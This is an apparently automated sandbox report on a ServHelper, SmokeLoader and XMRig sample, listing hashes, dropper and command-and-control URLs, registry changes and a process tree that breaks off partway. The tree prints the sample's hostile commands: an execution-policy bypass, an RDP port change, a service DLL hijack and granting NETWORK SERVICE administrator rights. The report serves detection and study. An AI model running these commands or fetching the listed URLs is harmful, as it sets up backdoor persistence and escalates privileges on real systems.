servhelper | 04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269

Analysis

max time kernel
151s
max time network
137s
submitted
01-01-1970 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
Size

184KB
MD5

575f53e97e579df4c6d518e1cfa8470e
SHA1

3cdad2ee89ce48b0ae2877d8f07c061c906418da
SHA256

04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269
SHA512

bba588869964f11d8d7be71c4aca9b35051fd70c65e95159cbe2192627303e6843db235a9cb1cdd28841d9871b42bc5b09b017928962631622c5d8d06bf164dd

Score

10^/10

servhelper smokeloader xmrig backdoor miner persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
74	3300	powershell.exe
77	3300	powershell.exe
78	3300	powershell.exe
79	3300	powershell.exe
81	3300	powershell.exe
83	3300	powershell.exe
85	3300	powershell.exe
87	3300	powershell.exe
89	3300	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

5550.exe6C34.exe

pid process

3376 5550.exe
956 6C34.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
3376	5550.exe
956	6C34.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

pid process

3020
Loads dropped DLL 2 IoCs

Processes:

pid process

3896
3896
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe

pid	process
3020

pid	process
3896
3896

description	ioc	process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI672.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI651.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI683.tmp	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI602.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI662.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0teko0lt.olu.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ppqyhwqs.gpp.psm1	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1032 956 WerFault.exe 6C34.exe

pid	pid_target	process	target process
1032	956	WerFault.exe	6C34.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1172 reg.exe
3216 reg.exe
Runs net.exe

pid	process
1172	reg.exe
3216	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	79	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	81	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

pid	process
2732	04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
2732	04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3020
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

628
628
628
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

pid process

2732 04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

pid	process
3020

pid	process
628
628
628

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe
Token: 34	4036	powershell.exe
Token: 35	4036	powershell.exe
Token: 36	4036	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeIncreaseQuotaPrivilege	2408	powershell.exe
Token: SeSecurityPrivilege	2408	powershell.exe
Token: SeTakeOwnershipPrivilege	2408	powershell.exe
Token: SeLoadDriverPrivilege	2408	powershell.exe
Token: SeSystemProfilePrivilege	2408	powershell.exe
Token: SeSystemtimePrivilege	2408	powershell.exe
Token: SeProfSingleProcessPrivilege	2408	powershell.exe
Token: SeIncBasePriorityPrivilege	2408	powershell.exe
Token: SeCreatePagefilePrivilege	2408	powershell.exe
Token: SeBackupPrivilege	2408	powershell.exe
Token: SeRestorePrivilege	2408	powershell.exe
Token: SeShutdownPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeSystemEnvironmentPrivilege	2408	powershell.exe
Token: SeRemoteShutdownPrivilege	2408	powershell.exe
Token: SeUndockPrivilege	2408	powershell.exe
Token: SeManageVolumePrivilege	2408	powershell.exe
Token: 33	2408	powershell.exe
Token: 34	2408	powershell.exe
Token: 35	2408	powershell.exe
Token: 36	2408	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeIncreaseQuotaPrivilege	3016	powershell.exe
Token: SeSecurityPrivilege	3016	powershell.exe
Token: SeTakeOwnershipPrivilege	3016	powershell.exe
Token: SeLoadDriverPrivilege	3016	powershell.exe
Token: SeSystemProfilePrivilege	3016	powershell.exe
Token: SeSystemtimePrivilege	3016	powershell.exe
Token: SeProfSingleProcessPrivilege	3016	powershell.exe
Token: SeIncBasePriorityPrivilege	3016	powershell.exe
Token: SeCreatePagefilePrivilege	3016	powershell.exe
Token: SeBackupPrivilege	3016	powershell.exe
Token: SeRestorePrivilege	3016	powershell.exe
Token: SeShutdownPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeSystemEnvironmentPrivilege	3016	powershell.exe
Token: SeRemoteShutdownPrivilege	3016	powershell.exe
Token: SeUndockPrivilege	3016	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

pid process

3020
3020
3020
3020
3020
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

pid process

3020
3020
3020
3020
3020
3020

pid	process
3020
3020
3020
3020
3020

pid	process
3020
3020
3020
3020
3020
3020

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5550.exepowershell.execsc.exe6C34.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 3020 wrote to memory of 3376	3020		5550.exe
PID 3020 wrote to memory of 3376	3020		5550.exe
PID 3376 wrote to memory of 972	3376	5550.exe	powershell.exe
PID 3376 wrote to memory of 972	3376	5550.exe	powershell.exe
PID 3020 wrote to memory of 956	3020		6C34.exe
PID 3020 wrote to memory of 956	3020		6C34.exe
PID 3020 wrote to memory of 956	3020		6C34.exe
PID 972 wrote to memory of 1172	972	powershell.exe	csc.exe
PID 972 wrote to memory of 1172	972	powershell.exe	csc.exe
PID 1172 wrote to memory of 1472	1172	csc.exe	cvtres.exe
PID 1172 wrote to memory of 1472	1172	csc.exe	cvtres.exe
PID 956 wrote to memory of 2772	956	6C34.exe	powershell.exe
PID 956 wrote to memory of 2772	956	6C34.exe	powershell.exe
PID 956 wrote to memory of 2772	956	6C34.exe	powershell.exe
PID 972 wrote to memory of 4036	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 4036	972	powershell.exe	powershell.exe
PID 2772 wrote to memory of 2736	2772	powershell.exe	csc.exe
PID 2772 wrote to memory of 2736	2772	powershell.exe	csc.exe
PID 2772 wrote to memory of 2736	2772	powershell.exe	csc.exe
PID 2736 wrote to memory of 780	2736	csc.exe	cvtres.exe
PID 2736 wrote to memory of 780	2736	csc.exe	cvtres.exe
PID 2736 wrote to memory of 780	2736	csc.exe	cvtres.exe
PID 972 wrote to memory of 2408	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 2408	972	powershell.exe	powershell.exe
PID 2772 wrote to memory of 3572	2772	powershell.exe	powershell.exe
PID 2772 wrote to memory of 3572	2772	powershell.exe	powershell.exe
PID 2772 wrote to memory of 3572	2772	powershell.exe	powershell.exe
PID 972 wrote to memory of 3016	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 3016	972	powershell.exe	powershell.exe
PID 2772 wrote to memory of 364	2772	powershell.exe	powershell.exe
PID 2772 wrote to memory of 364	2772	powershell.exe	powershell.exe
PID 2772 wrote to memory of 364	2772	powershell.exe	powershell.exe
PID 972 wrote to memory of 3544	972	powershell.exe	reg.exe
PID 972 wrote to memory of 3544	972	powershell.exe	reg.exe
PID 972 wrote to memory of 1172	972	powershell.exe	reg.exe
PID 972 wrote to memory of 1172	972	powershell.exe	reg.exe
PID 972 wrote to memory of 1700	972	powershell.exe	reg.exe
PID 972 wrote to memory of 1700	972	powershell.exe	reg.exe
PID 972 wrote to memory of 744	972	powershell.exe	net.exe
PID 972 wrote to memory of 744	972	powershell.exe	net.exe
PID 744 wrote to memory of 1268	744	net.exe	net1.exe
PID 744 wrote to memory of 1268	744	net.exe	net1.exe
PID 972 wrote to memory of 2828	972	powershell.exe	cmd.exe
PID 972 wrote to memory of 2828	972	powershell.exe	cmd.exe
PID 2828 wrote to memory of 2156	2828	cmd.exe	cmd.exe
PID 2828 wrote to memory of 2156	2828	cmd.exe	cmd.exe
PID 2156 wrote to memory of 3592	2156	cmd.exe	net.exe
PID 2156 wrote to memory of 3592	2156	cmd.exe	net.exe
PID 3592 wrote to memory of 2468	3592	net.exe	net1.exe
PID 3592 wrote to memory of 2468	3592	net.exe	net1.exe
PID 972 wrote to memory of 1016	972	powershell.exe	cmd.exe
PID 972 wrote to memory of 1016	972	powershell.exe	cmd.exe
PID 1016 wrote to memory of 3240	1016	cmd.exe	cmd.exe
PID 1016 wrote to memory of 3240	1016	cmd.exe	cmd.exe
PID 3240 wrote to memory of 3884	3240	cmd.exe	net.exe
PID 3240 wrote to memory of 3884	3240	cmd.exe	net.exe
PID 3884 wrote to memory of 1056	3884	net.exe	net1.exe
PID 3884 wrote to memory of 1056	3884	net.exe	net1.exe
PID 652 wrote to memory of 3796	652	cmd.exe	net.exe
PID 652 wrote to memory of 3796	652	cmd.exe	net.exe
PID 3796 wrote to memory of 3108	3796	net.exe	net1.exe
PID 3796 wrote to memory of 3108	3796	net.exe	net1.exe
PID 2772 wrote to memory of 3416	2772	powershell.exe	powershell.exe
PID 2772 wrote to memory of 3416	2772	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
"C:\Users\Admin\AppData\Local\Temp\04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2732

C:\Users\Admin\AppData\Local\Temp\5550.exe
C:\Users\Admin\AppData\Local\Temp\5550.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxudbmg1\wxudbmg1.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES756A.tmp" "c:\Users\Admin\AppData\Local\Temp\wxudbmg1\CSC9F2143BEB8C94DBAAA53CAF45CADB7.TMP"
      4⤵
      PID:1472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3544
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1172
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1700
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2828
  - - C:\Windows\system32\cmd.exe
